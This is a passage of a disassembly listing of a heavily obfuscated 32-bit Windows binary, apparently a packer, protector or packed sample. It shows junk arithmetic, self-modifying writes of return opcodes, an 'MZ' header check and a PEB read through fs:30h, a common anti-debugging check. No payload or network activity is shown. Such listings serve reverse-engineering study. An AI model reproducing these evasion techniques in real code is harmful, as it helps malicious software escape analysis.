; FUNCTION CHUNK AT 004440EF SIZE 00000026 BYTES
; FUNCTION CHUNK AT 00444432 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00446285 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447204 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448018 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044A474 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044B709 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C323 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044D04D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458B86 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045B349 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0045B503 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		sub	al, 99h
		jmp	loc_44C323
sub_43F770	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		shl	edx, 4
		jmp	sub_44A089
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DCA

loc_43F783:				; CODE XREF: sub_448DCA+Dj
		ja	loc_43C204
		mov	esi, eax
		jmp	loc_44691C
; END OF FUNCTION CHUNK	FOR sub_448DCA
; ---------------------------------------------------------------------------

loc_43F790:				; CODE XREF: y2kk37jd:0043C440j
		sub	ebx, 0EBF05DD5h
		ror	edx, 1Fh
		not	ebx
		jmp	loc_450E38
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FE06

loc_43F7A0:				; CODE XREF: sub_43FE06+18255j
		mov	ebp, ecx
		ror	edx, 0Ah
		ja	sub_43F0A5

loc_43F7AB:				; CODE XREF: sub_43FE06:loc_458053j
		and	esi, 0B5CF96B0h
		add	esi, 0C6356F6Dh
		xor	eax, esi
		jmp	loc_448410
; END OF FUNCTION CHUNK	FOR sub_43FE06
; ---------------------------------------------------------------------------
		mov	ebx, edi
		jmp	loc_4593F7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F334

loc_43F7C5:				; CODE XREF: sub_44F334+Cj
		push	ecx
		push	eax
		pop	ecx
		xchg	ecx, [esp+2CCh+var_2CC]
		push	offset loc_451CB8
		jmp	loc_4516C1
; END OF FUNCTION CHUNK	FOR sub_44F334
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441AAB

loc_43F7D5:				; CODE XREF: sub_441AAB-6369j
		popf
		mov	edi, 52C47857h
		jmp	loc_457DBB
; END OF FUNCTION CHUNK	FOR sub_441AAB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_487. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43F7E1:				; CODE XREF: y2kk37jd:0044010Bj
					; y2kk37jd:loc_450280j
		mov	eax, [ebp-108h]
		mov	byte ptr [ebp+eax-100h], 0
		push	2010h
		push	0
		jmp	loc_4447E5
; ---------------------------------------------------------------------------

loc_43F7FB:				; CODE XREF: y2kk37jd:loc_441ED6j
		mov	eax, [ebp-104h]
		jmp	loc_442AFD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_405. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451854

loc_43F807:				; CODE XREF: sub_451854+6382j
		jmp	loc_4457E2
; END OF FUNCTION CHUNK	FOR sub_451854
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B0F5

loc_43F80C:				; CODE XREF: sub_43B0F5+12j
		jmp	loc_458CA5
; END OF FUNCTION CHUNK	FOR sub_43B0F5

; =============== S U B	R O U T	I N E =======================================



sub_43F811	proc near		; CODE XREF: y2kk37jd:loc_456FBAj
					; DATA XREF: sub_4543EF-17EB2o

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044496E SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004465B2 SIZE 00000005 BYTES

		push	edi
		push	293CF0Ah
		xchg	ecx, [esp+8+var_8]
		mov	edi, ecx
		pop	ecx
		rol	edi, 11h
		or	edi, ds:4000E9h
		add	edi, 418D41CFh
		jmp	loc_4465B2
sub_43F811	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_43F831:				; CODE XREF: sub_445226:loc_455551j
		jb	loc_43C057
		jz	loc_457BBB
		jmp	loc_43DCAC
; ---------------------------------------------------------------------------

loc_43F842:				; CODE XREF: sub_445226+1F0j
		and	eax, 0B03985C1h
		add	eax, 873B66D0h
		jnb	loc_45A4D3
		rol	ebx, 17h
		jmp	loc_4538BE
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		mov	ds:off_41E0D8, eax
		lea	eax, loc_44900D
		mov	byte ptr [eax],	0C3h
		jmp	loc_44900D
; ---------------------------------------------------------------------------
		call	nullsub_461
		jmp	ds:dword_41E0DC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B491

loc_43F87B:				; CODE XREF: sub_45B491-DC40j
		jmp	loc_454704
; END OF FUNCTION CHUNK	FOR sub_45B491
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_461. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		js	loc_447784
		jmp	loc_447F5A
; ---------------------------------------------------------------------------

loc_43F88C:				; CODE XREF: y2kk37jd:004473F5j
		add	edx, 0DC3D4CAAh
		mov	[edx], eax
		pop	edx
		lea	eax, sub_4587AA
		mov	byte ptr [eax],	0C3h
		jmp	loc_45A7E1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4444CA

loc_43F8A3:				; CODE XREF: sub_4444CA+4j
		pop	edx
		mov	eax, [esp-4+arg_0]
		jmp	loc_444B3A
; END OF FUNCTION CHUNK	FOR sub_4444CA
; ---------------------------------------------------------------------------
		jnz	loc_452B8B
		jmp	loc_44541B
; ---------------------------------------------------------------------------

loc_43F8B7:				; CODE XREF: y2kk37jd:00459331j
		pop	eax

; =============== S U B	R O U T	I N E =======================================



sub_43F8B8	proc near		; CODE XREF: sub_44F930+8p

var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043B2C2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043B51A SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0043BC2A SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0043BEEB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043CFE3 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043D016 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043D5B7 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043E05C SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043EC33 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043FE88 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004421AD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442DD5 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00442E3A SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004439AC SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044449B SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00445B9D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044618E SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044664A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446ADC SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00447E9A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B130 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C16B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044C7CB SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044CE60 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044D2F1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D47D SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044EA30 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F0A6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044F463 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044F7A1 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044F90F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450153 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00451832 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452246 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004533FB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453ED4 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00454035 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00455585 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 004576B2 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0045A74B SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045A76D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AA84 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0045B1CD SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045B3D2 SIZE 0000000B BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		push	5465984Eh
		jmp	loc_4533FB
sub_43F8B8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_43F8C6:				; CODE XREF: sub_45689F-7490j
		pushf

loc_43F8C7:				; CODE XREF: sub_45689F:loc_44F408j
		or	edx, 0DD979C8h
		cmp	edx, 0D6861416h
		jmp	loc_44AFC3
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445568

loc_43F8D8:				; CODE XREF: sub_445568+81A6j
		sbb	ebp, ebx
		jmp	loc_44649D
; END OF FUNCTION CHUNK	FOR sub_445568
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449C4F

loc_43F8DF:				; CODE XREF: sub_449C4F:loc_45BB7Dj
		add	eax, ebp
		add	eax, 71F61268h
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jmp	loc_4459AA
; END OF FUNCTION CHUNK	FOR sub_449C4F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45157A

loc_43F8F1:				; CODE XREF: sub_456809-B9DFj
					; sub_45157A-622j
		and	ebx, 0EE825765h
		rol	ebx, 19h
		jnb	loc_444EBC
; END OF FUNCTION CHUNK	FOR sub_45157A
; START	OF FUNCTION CHUNK FOR sub_43CB6C

loc_43F900:				; CODE XREF: sub_43CB6C+3F88j
		jmp	nullsub_33
; END OF FUNCTION CHUNK	FOR sub_43CB6C
; ---------------------------------------------------------------------------
		db 0Fh,	8Ah, 7Ch
		dd 0E9000111h, 0D53Fh
; ---------------------------------------------------------------------------

loc_43F910:				; CODE XREF: y2kk37jd:00443E0Ej
		pushf

; =============== S U B	R O U T	I N E =======================================



sub_43F911	proc near		; CODE XREF: sub_456809-6CCDp

var_4		= dword	ptr -4
arg_0		= dword	ptr  4
arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 0043B290 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043BD22 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043C02E SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0043C8B8 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043D18B SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043DB5C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DDDF SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0043DFFE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044056C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004414F9 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00442494 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044302C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044628F SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00447295 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004494D1 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044A712 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AE06 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044C7C6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CBB9 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044CBDC SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0044D501 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044D8C0 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044DE2E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E6AE SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044F03E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044F470 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044F4B3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FC17 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0045067F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451FB1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452BC0 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00453821 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00454874 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045490F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454A28 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00454C01 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004557AA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457221 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458E41 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00459C75 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0045AB1D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045C665 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045C70F SIZE 0000000A BYTES

		xchg	edi, [esp-4+arg_0]
		pop	edi
		add	ecx, 0A244F95Ch
		mov	[ecx], eax
		pop	ecx
		mov	eax, [ebp-4]
		cmp	word ptr [eax],	5A4Dh
		jmp	loc_44056C
sub_43F911	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43F92B:				; CODE XREF: y2kk37jd:0044A71Ej
		jbe	loc_44695B
		mov	ebx, [edx]
; START	OF FUNCTION CHUNK FOR sub_43BF31

loc_43F933:				; CODE XREF: sub_445226:loc_44535Dj
					; sub_43BF31:loc_44A70Cj
		or	eax, ds:4000EBh
		add	eax, 0F9A27C1h
		mov	eax, [eax]
		mov	edx, [ebp-4]
		mov	byte ptr [eax+edx], 0
		jmp	loc_45B3E2
; END OF FUNCTION CHUNK	FOR sub_43BF31
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445787

loc_43F94D:				; CODE XREF: sub_445787+7j
		mov	eax, [esp-8+arg_4]
		push	ecx
		mov	ecx, edx
		xchg	ecx, [esp+0]
		call	sub_43F618
		mov	eax, 3CC6743Ch
		push	ebx
		push	0FF2B77FCh
		jmp	loc_45633B
; END OF FUNCTION CHUNK	FOR sub_445787
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_43F96B:				; CODE XREF: sub_445226:loc_43E009j
		mov	edx, [edx]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_44FC3B
		jmp	loc_446397
; END OF FUNCTION CHUNK	FOR sub_445226

; =============== S U B	R O U T	I N E =======================================



sub_43F97C	proc near		; CODE XREF: sub_458520-1D119p
					; y2kk37jd:004477C0j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00445D94 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		xchg	edi, [esp-4+arg_0]
		jmp	loc_445D94
sub_43F97C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4490B4

loc_43F988:				; CODE XREF: sub_4490B4+573Fj
		ror	ebp, 9

loc_43F98B:				; CODE XREF: sub_4490B4:loc_446A71j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_4552E8
		jmp	loc_44E618
; END OF FUNCTION CHUNK	FOR sub_4490B4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456F0F

loc_43F99C:				; CODE XREF: sub_456F0F+1Fj
		mov	byte ptr [eax],	0C3h
		jmp	loc_44C654
; END OF FUNCTION CHUNK	FOR sub_456F0F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4504DD

loc_43F9A4:				; CODE XREF: sub_4504DD:loc_457B27j
		pop	edx
		mov	eax, [esp-4+arg_0]
		call	sub_44B489
; END OF FUNCTION CHUNK	FOR sub_4504DD
; START	OF FUNCTION CHUNK FOR sub_4571A7

loc_43F9AD:				; CODE XREF: sub_4571A7:loc_455B61j
		pop	edx
		jmp	loc_440DF8
; END OF FUNCTION CHUNK	FOR sub_4571A7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_43F9B3:				; CODE XREF: sub_445226:loc_446334j
		lea	eax, [ebp-24h]
		push	eax
		push	100h
		push	4C7CFC60h
		pop	eax
		sub	eax, 1D900028h
		or	eax, 0ABB5E3CCh
		jmp	loc_45BD42
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4599BE

loc_43F9D3:				; CODE XREF: sub_4599BE-1DFF5j
		xchg	edx, eax
		ror	edx, 1Dh
		add	eax, ecx
		sbb	ebx, 0B70F6C98h
		jmp	loc_4455D8
; END OF FUNCTION CHUNK	FOR sub_4599BE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_496. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_43F9E6:				; CODE XREF: sub_445226+14F55j
		jmp	loc_4567E7
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_43F9EB:				; CODE XREF: y2kk37jd:0044E887j
		jmp	locret_441B90
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_43F9F0:				; CODE XREF: sub_445226+32j
		jmp	sub_459F8F
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E840

loc_43F9F5:				; CODE XREF: sub_44E840-65AAj
		popf
		xchg	esi, [esp-4+arg_0]
		jmp	loc_441E8E
; END OF FUNCTION CHUNK	FOR sub_44E840
; ---------------------------------------------------------------------------
		mov	[ebp-8], eax
		cmp	dword ptr [ebp-8], 0
		jz	loc_45471E
		jmp	loc_4563D6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B508

loc_43FA10:				; CODE XREF: sub_44B508-8EA9j
		jz	loc_44C1B3
		jmp	loc_458044
; END OF FUNCTION CHUNK	FOR sub_44B508
; ---------------------------------------------------------------------------

loc_43FA1B:				; CODE XREF: y2kk37jd:00447B74j
		xchg	ebx, [esp]
		jmp	loc_456861
; ---------------------------------------------------------------------------

loc_43FA23:				; CODE XREF: y2kk37jd:0044040Aj
					; y2kk37jd:loc_44197Dj
		mov	eax, [esp]
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp]
		jmp	loc_44C75C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4486E1

loc_43FA31:				; CODE XREF: sub_4486E1:loc_455EBEj
		mov	dx, [eax+2]
		push	0E57E9A6Bh
		pop	eax
		rol	eax, 1Fh
		and	eax, 0CB30E768h
		jmp	loc_458AAD
; END OF FUNCTION CHUNK	FOR sub_4486E1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_43FA49:				; CODE XREF: sub_43F346:loc_455CDAj
		jnb	loc_44E48B
		jmp	loc_4455D0
; END OF FUNCTION CHUNK	FOR sub_43F346
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F52

loc_43FA54:				; CODE XREF: sub_442F52:loc_459FAAj
		jnz	loc_4582DB
		push	ebp
		xor	ebx, edx
		xor	ebp, eax
		jmp	loc_4582D5
; END OF FUNCTION CHUNK	FOR sub_442F52
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440337

loc_43FA64:				; CODE XREF: sub_440337-7E7j
		jz	loc_454A92
; END OF FUNCTION CHUNK	FOR sub_440337
; START	OF FUNCTION CHUNK FOR sub_448C53

loc_43FA6A:				; CODE XREF: sub_448C53+6746j
		jmp	sub_455AA9
; END OF FUNCTION CHUNK	FOR sub_448C53
; ---------------------------------------------------------------------------
		or	ecx, 6A572A4Ch
		popf
		jge	loc_43E514
		jmp	loc_454A92
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_43FA81:				; CODE XREF: sub_45B7AA+14j
		jz	loc_440525
		jmp	loc_443D37
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440FDF

loc_43FA8C:				; CODE XREF: sub_440FDF:loc_451244j
		mov	ebx, edx
		xchg	ebx, [esp+0]
		call	sub_45ADEC
		mov	eax, 5389CFC1h
		call	sub_442C3E
		push	esi
		push	7FC05D0Fh
		pop	esi
		jmp	loc_441D9C
; END OF FUNCTION CHUNK	FOR sub_440FDF
; ---------------------------------------------------------------------------
		shr	edi, 12h
		shl	ebp, 6
		jmp	sub_44C4BC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B0D0

loc_43FAB7:				; CODE XREF: sub_44B0D0+10DE0j
		jz	loc_4583D1

loc_43FABD:				; CODE XREF: sub_459318+Fj
		jmp	nullsub_416
; END OF FUNCTION CHUNK	FOR sub_44B0D0
; ---------------------------------------------------------------------------

loc_43FAC2:				; CODE XREF: y2kk37jd:00447B56j
		jmp	loc_45ABEF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4436E7

loc_43FAC7:				; CODE XREF: sub_4436E7+Ej
		jmp	loc_44B374
; END OF FUNCTION CHUNK	FOR sub_4436E7
; ---------------------------------------------------------------------------
		ror	eax, 7
		adc	edi, 0A88EED1Fh
		jmp	loc_4583D1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45136B

loc_43FADA:				; CODE XREF: sub_45136B:loc_43B29Bj
		add	eax, 0C465293Ah
		jmp	loc_458FEC
; END OF FUNCTION CHUNK	FOR sub_45136B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_272. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445A2D

loc_43FAE6:				; CODE XREF: sub_445A2D+16j
		jmp	loc_44715E
; END OF FUNCTION CHUNK	FOR sub_445A2D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44516F

loc_43FAEB:				; CODE XREF: sub_44516F-3CDFj
		jmp	sub_443AFD
; END OF FUNCTION CHUNK	FOR sub_44516F
; ---------------------------------------------------------------------------

loc_43FAF0:				; CODE XREF: y2kk37jd:0044972Fj
		mov	ebx, edx
		xchg	ebx, [esp]
		call	sub_45ADEC
		push	979E93B1h
		pop	eax
		rol	eax, 8
		test	eax, 200000h
		jmp	loc_441FC5
; ---------------------------------------------------------------------------

locret_43FB0E:				; CODE XREF: y2kk37jd:loc_43C173j
		retn
; ---------------------------------------------------------------------------

loc_43FB0F:				; DATA XREF: sub_44A6E9+19o
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
; START	OF FUNCTION CHUNK FOR sub_445226

loc_43FB18:				; CODE XREF: sub_445226+82B9j
		jmp	loc_45BAD4
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CDD5

loc_43FB1D:				; CODE XREF: sub_44CDD5:loc_43CD91j
		sbb	ebx, 0E8D95001h
		jmp	loc_4469C9
; END OF FUNCTION CHUNK	FOR sub_44CDD5
; ---------------------------------------------------------------------------
		jge	loc_441638
		jmp	sub_451A53
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440337

loc_43FB33:				; CODE XREF: sub_452995:loc_4511F4j
					; sub_440337:loc_45A4C6j
		call	sub_45405E
		push	6C4007CDh
		pop	edx
		sub	edx, ds:4000EBh
		and	edx, 9152A6B0h
		test	edx, 2000000h
		jmp	loc_43FA64
; END OF FUNCTION CHUNK	FOR sub_440337
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4564EB

loc_43FB55:				; CODE XREF: sub_4564EB:loc_43C40Aj
		or	ebx, 0E4857229h
		xor	ebx, 0E720CBC2h
		add	ebx, ebp
		jmp	loc_4519FB
; END OF FUNCTION CHUNK	FOR sub_4564EB
; ---------------------------------------------------------------------------

loc_43FB68:				; DATA XREF: sub_450857-A3DAo
		sub	eax, 0E0FC5228h
		push	esi
		push	749D49EDh
		pop	esi
		jmp	loc_4562ED
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451A35

loc_43FB7A:				; CODE XREF: sub_451A35+11j
		pop	eax
		rol	eax, 1
		cmp	eax, 216564D7h
		jmp	loc_43DBAF
; END OF FUNCTION CHUNK	FOR sub_451A35
; ---------------------------------------------------------------------------
		mov	[ebx], edi
		jmp	sub_43CA49
; ---------------------------------------------------------------------------

loc_43FB8F:				; DATA XREF: y2kk37jd:0043E180o
		mov	eax, [ebp+8]
		cmp	dword ptr [eax-1Ch], 0F7h
		jnz	loc_43F403
		jmp	loc_4408CF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444A2B

loc_43FBA4:				; CODE XREF: sub_444A2B:loc_44F7BCj
		mov	eax, [ebp+8]
		cmp	dword ptr [eax-1Ch], 0F6h
		jz	loc_45B386
		jmp	loc_45B376
; END OF FUNCTION CHUNK	FOR sub_444A2B

; =============== S U B	R O U T	I N E =======================================



sub_43FBB9	proc near		; CODE XREF: sub_43BA66+2BEDp
					; y2kk37jd:00452A4Fj
		xchg	edx, [esp+0]
		pop	edx
		add	edi, 0A4D5C939h
		push	offset sub_4570BB
		jmp	nullsub_31
sub_43FBB9	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440337

loc_43FBCD:				; CODE XREF: sub_440337+E110j
		shl	eax, 1Eh
		jmp	loc_447209
; END OF FUNCTION CHUNK	FOR sub_440337
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44606C

loc_43FBD5:				; CODE XREF: sub_44606C+96A6j
		jge	loc_43EEDD

loc_43FBDB:				; CODE XREF: y2kk37jd:0045082Fj
		jmp	sub_440337
; END OF FUNCTION CHUNK	FOR sub_44606C
; ---------------------------------------------------------------------------
		mov	[eax], esi
		jmp	loc_45992E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D5A6

loc_43FBE7:				; CODE XREF: y2kk37jd:loc_43D713j
					; sub_44D5A6:loc_44593Bj ...
		sub	eax, 2ACFD284h
		xor	eax, 4C1D7BDDh
		push	ebx
		pushf
		push	4A1097D2h
		jmp	loc_44608E
; END OF FUNCTION CHUNK	FOR sub_44D5A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44113A

loc_43FBFF:				; CODE XREF: sub_44113A+98DAj
		jz	loc_4440CC
		jmp	loc_440CFC
; END OF FUNCTION CHUNK	FOR sub_44113A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B8D6

loc_43FC0A:				; CODE XREF: sub_43B8D6+2723j
		jb	loc_457D55
		popf
		sbb	ecx, 76765BDh
		jmp	loc_4425CE
; END OF FUNCTION CHUNK	FOR sub_43B8D6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_275. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B491

loc_43FC1E:				; CODE XREF: sub_45B491+8j
		jmp	loc_44D84B
; END OF FUNCTION CHUNK	FOR sub_45B491
; ---------------------------------------------------------------------------

loc_43FC23:				; CODE XREF: y2kk37jd:00443507j
		call	sub_4444B1
; START	OF FUNCTION CHUNK FOR sub_4562E5

loc_43FC28:				; CODE XREF: sub_4562E5+2236j
		jmp	loc_44DFBD
; END OF FUNCTION CHUNK	FOR sub_4562E5
; ---------------------------------------------------------------------------

loc_43FC2D:				; DATA XREF: sub_443AA7+168B1o
		xchg	ebp, [esp]
		push	edi
		mov	edi, eax
		xchg	edi, [esp]
		mov	edx, eax

; =============== S U B	R O U T	I N E =======================================



sub_43FC38	proc near		; CODE XREF: sub_448526-141Cj

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043FC97 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A76D SIZE 00000020 BYTES

		push	ebx
		push	0CE63BEE5h
		pop	ebx
		jmp	loc_43FC97
sub_43FC38	endp

; ---------------------------------------------------------------------------
		jmp	loc_452B80
; ---------------------------------------------------------------------------
		jmp	loc_459829
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443AA7

loc_43FC4E:				; CODE XREF: sub_443AA7:loc_43DA29j
		mov	eax, large fs:30h
		push	esi
		push	0C26C0FD0h
